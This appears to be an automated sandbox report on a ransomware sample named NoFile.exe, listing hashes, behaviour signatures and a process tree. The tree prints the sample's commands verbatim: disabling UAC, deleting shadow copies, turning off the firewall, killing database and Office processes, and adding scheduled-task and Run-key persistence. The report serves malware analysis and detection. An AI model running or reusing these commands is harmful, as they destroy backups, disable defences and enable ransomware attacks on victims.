Resubmissions

06/02/2022, 09:21

220206-lbgarshbe9 10

06/02/2022, 09:18

220206-k9rcyshcfn 10

Analysis

  • max time kernel
    150s
  • max time network
    132s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    06/02/2022, 09:18

General

  • Target

    NoFile.exe

  • Size

    2.2MB

  • MD5

    7d1ed67b77f47ba8aadf9a3ac7d0c371

  • SHA1

    a598e6708c189caeef1fa76064feb4d0155abb3d

  • SHA256

    87300e6563c7ac9d8d758b219d135fb8b84a7788419a0ddd8c3470cc1e739eae

  • SHA512

    17e468ba87f06c599b40b2dc8256bacfcfeb53cde8ac48b77d61f2c5a074b9cbe19e27e71029c67960d18af886813fc2c1b2b5afd89ae25147b179c233f120f9

Signatures

  • UAC bypass 3 TTPs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies Windows Firewall 1 TTPs
  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Drops desktop.ini file(s) 2 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 10 IoCs
  • Enumerates processes with tasklist 1 TTPs 11 IoCs
  • Gathers system information 1 TTPs 2 IoCs

    Runs systeminfo.exe.

  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 40 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\NoFile.exe
    "C:\Users\Admin\AppData\Local\Temp\NoFile.exe"
    1⤵
    • Drops startup file
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1604
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:808
      • C:\Windows\SysWOW64\tasklist.exe
        tasklist /v /fo csv
        3⤵
        • Enumerates processes with tasklist
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:796
      • C:\Windows\SysWOW64\findstr.exe
        findstr /i "dcdcf"
        3⤵
        PID:1032
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ver
      2⤵
      PID:1796
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&t2_svc.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1820
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\v9_svc.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:580
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /C echo C:\Users\Admin\AppData\h4_svc.bat
          4⤵
          PID:1624
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\Users\Admin\AppData\h4_svc.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:832
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist /v
            5⤵
            • Enumerates processes with tasklist
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:632
          • C:\Windows\SysWOW64\find.exe
            find /I /c "dcdcf"
            5⤵
            PID:1176
          • C:\Windows\SysWOW64\vssadmin.exe
            vssadmin.exe Delete Shadows /All /Quiet
            5⤵
            • Interacts with shadow copies
            PID:1260
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 15 /nobreak
            5⤵
            • Delays execution with timeout.exe
            PID:672
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist /fi "ImageName eq NoFile.exe" /fo csv
            5⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:1820
          • C:\Windows\SysWOW64\find.exe
            find /I "NoFile.exe"
            5⤵
            PID:1728
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 15 /nobreak
            5⤵
            • Delays execution with timeout.exe
            PID:552
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist /fi "ImageName eq NoFile.exe" /fo csv
            5⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:1696
          • C:\Windows\SysWOW64\find.exe
            find /I "NoFile.exe"
            5⤵
            PID:1860
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 15 /nobreak
            5⤵
            • Delays execution with timeout.exe
            PID:1740
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist /fi "ImageName eq NoFile.exe" /fo csv
            5⤵
            • Enumerates processes with tasklist
            PID:1060
          • C:\Windows\SysWOW64\find.exe
            find /I "NoFile.exe"
            5⤵
            PID:1048
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 15 /nobreak
            5⤵
            • Delays execution with timeout.exe
            PID:560
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist /fi "ImageName eq NoFile.exe" /fo csv
            5⤵
            • Enumerates processes with tasklist
            PID:364
          • C:\Windows\SysWOW64\find.exe
            find /I "NoFile.exe"
            5⤵
            PID:2004
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 15 /nobreak
            5⤵
            • Delays execution with timeout.exe
            PID:1780
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist /fi "ImageName eq NoFile.exe" /fo csv
            5⤵
            • Enumerates processes with tasklist
            PID:968
          • C:\Windows\SysWOW64\find.exe
            find /I "NoFile.exe"
            5⤵
            PID:292
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 15 /nobreak
            5⤵
            • Delays execution with timeout.exe
            PID:1708
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist /fi "ImageName eq NoFile.exe" /fo csv
            5⤵
            • Enumerates processes with tasklist
            PID:1928
          • C:\Windows\SysWOW64\find.exe
            find /I "NoFile.exe"
            5⤵
            PID:1060
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 15 /nobreak
            5⤵
            • Delays execution with timeout.exe
            PID:688
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist /fi "ImageName eq NoFile.exe" /fo csv
            5⤵
            • Enumerates processes with tasklist
            PID:1396
          • C:\Windows\SysWOW64\find.exe
            find /I "NoFile.exe"
            5⤵
            PID:580
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 15 /nobreak
            5⤵
            • Delays execution with timeout.exe
            PID:1588
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist /fi "ImageName eq NoFile.exe" /fo csv
            5⤵
            • Enumerates processes with tasklist
            PID:972
          • C:\Windows\SysWOW64\find.exe
            find /I "NoFile.exe"
            5⤵
            PID:840
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 15 /nobreak
            5⤵
            • Delays execution with timeout.exe
            PID:968
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist /fi "ImageName eq NoFile.exe" /fo csv
            5⤵
            • Enumerates processes with tasklist
            PID:1872
          • C:\Windows\SysWOW64\find.exe
            find /I "NoFile.exe"
            5⤵
            PID:1360
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 15 /nobreak
            5⤵
            • Delays execution with timeout.exe
            PID:1656
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\t2_svc.bat'" /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:268
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\Admin\AppData\t2_svc.bat'" /f
        3⤵
        • Creates scheduled task(s)
        PID:560
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1876
      • C:\Windows\SysWOW64\nslookup.exe
        nslookup myip.opendns.com. resolver1.opendns.com
        3⤵
        PID:1512
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c echo %date%-%time%
      2⤵
      PID:1924
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
      2⤵
      PID:1776
      • C:\Windows\SysWOW64\systeminfo.exe
        systeminfo
        3⤵
        • Gathers system information
        PID:964
      • C:\Windows\SysWOW64\find.exe
        find /i "os name"
        3⤵
        PID:2028
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
      2⤵
      PID:1612
      • C:\Windows\SysWOW64\systeminfo.exe
        systeminfo
        3⤵
        • Gathers system information
        PID:1160
      • C:\Windows\SysWOW64\find.exe
        find /i "original"
        3⤵
        PID:1540
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
      2⤵
      PID:556
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • Modifies registry key
        PID:856
      • C:\Windows\SysWOW64\vssadmin.exe
        vssadmin.exe Delete Shadows /All /Quiet
        3⤵
        • Interacts with shadow copies
        PID:772
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic shadowcopy delete
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:460
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall set currentprofile state off
        3⤵
        PID:2020
      • C:\Windows\SysWOW64\netsh.exe
        netsh firewall set opmode mode=disable
        3⤵
        PID:624
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
        3⤵
        PID:1524
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /im notepad.exe&taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe
      2⤵
      PID:1572
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im notepad.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1696
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im msftesql.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1708
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im sqlagent.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1740
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im sqlbrowser.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:316
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im sqlservr.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:820
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im sqlwriter.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:364
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im oracle.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1396
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im ocssd.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1364
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im dbsnmp.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2020
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im synctime.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1244
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im agntsvc.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1552
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im mydesktopqos.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:920
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im isqlplussvc.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:932
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im xfssvccon.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1272
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im mydesktopservice.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:560
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im ocautoupds.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1984
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im agntsvc.exe
        3⤵
        • Kills process with taskkill
        PID:268
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im encsvc.exe
        3⤵
        • Kills process with taskkill
        PID:292
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im firefoxconfig.exe
        3⤵
        • Kills process with taskkill
        PID:964
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im tbirdconfig.exe
        3⤵
        • Kills process with taskkill
        PID:1044
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im ocomm.exe
        3⤵
        • Kills process with taskkill
        PID:1776
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im mysqld.exe
        3⤵
        • Kills process with taskkill
        PID:1612
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im mysqld-nt.exe
        3⤵
        • Kills process with taskkill
        PID:1728
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im mysqld-opt.exe
        3⤵
        • Kills process with taskkill
        PID:1664
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im dbeng50.exe
        3⤵
        • Kills process with taskkill
        PID:1060
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im sqbcoreservice.exe
        3⤵
        • Kills process with taskkill
        PID:1300
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im excel.exe
        3⤵
        • Kills process with taskkill
        PID:460
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im infopath.exe
        3⤵
        • Kills process with taskkill
        PID:1924
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im msaccess.exe
        3⤵
        • Kills process with taskkill
        PID:2028
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im mspub.exe
        3⤵
        • Kills process with taskkill
        PID:624
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im onenote.exe
        3⤵
        • Kills process with taskkill
        PID:1524
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im outlook.exe
        3⤵
        • Kills process with taskkill
        PID:1520
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im powerpnt.exe
        3⤵
        • Kills process with taskkill
        PID:864
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im steam.exe
        3⤵
        • Kills process with taskkill
        PID:1732
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im thebat.exe
        3⤵
        • Kills process with taskkill
        PID:1548
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im thebat64.exe
        3⤵
        • Kills process with taskkill
        PID:1272
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im thunderbird.exe
        3⤵
        • Kills process with taskkill
        PID:688
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im visio.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        PID:580
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im winword.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        PID:1780
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im wordpad.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        PID:1260
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f&reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
                                                      2⤵
                                                        PID:1708
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
                                                          3⤵
                                                            PID:1728
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
                                                            3⤵
                                                            • Modifies registry key
                                                            PID:672
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f&reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
                                                          2⤵
                                                            PID:564
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
                                                              3⤵
                                                              • Adds Run key to start application
                                                              • Modifies registry key
                                                              PID:1732
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
                                                              3⤵
                                                              • Adds Run key to start application
                                                              PID:1944
                                                        • C:\Windows\system32\vssvc.exe
                                                          C:\Windows\system32\vssvc.exe
                                                          1⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2008
                                                        • C:\Windows\system32\taskmgr.exe
                                                          "C:\Windows\system32\taskmgr.exe" /4
                                                          1⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          • Suspicious use of FindShellTrayWindow
                                                          • Suspicious use of SendNotifyMessage
                                                          PID:796
                                                        • C:\Windows\explorer.exe
                                                          "C:\Windows\explorer.exe"
                                                          1⤵
                                                            PID:1916
                                                          • C:\Windows\system32\NOTEPAD.EXE
                                                            "C:\Windows\system32\NOTEPAD.EXE" C:\Read_Me!_.txt
                                                            1⤵
                                                              PID:1060
                                                            • C:\Windows\SysWOW64\mshta.exe
                                                              "C:\Windows\SysWOW64\mshta.exe" "C:\ReadMe_Now!.hta"
                                                              1⤵
                                                                PID:1916

Network

MITRE ATT&CK Enterprise v6

Downloads

• memory/796-59-0x000007FEFC0E1000-0x000007FEFC0E3000-memory.dmp
  Filesize: 8KB

• memory/1604-53-0x0000000075531000-0x0000000075533000-memory.dmp
  Filesize: 8KB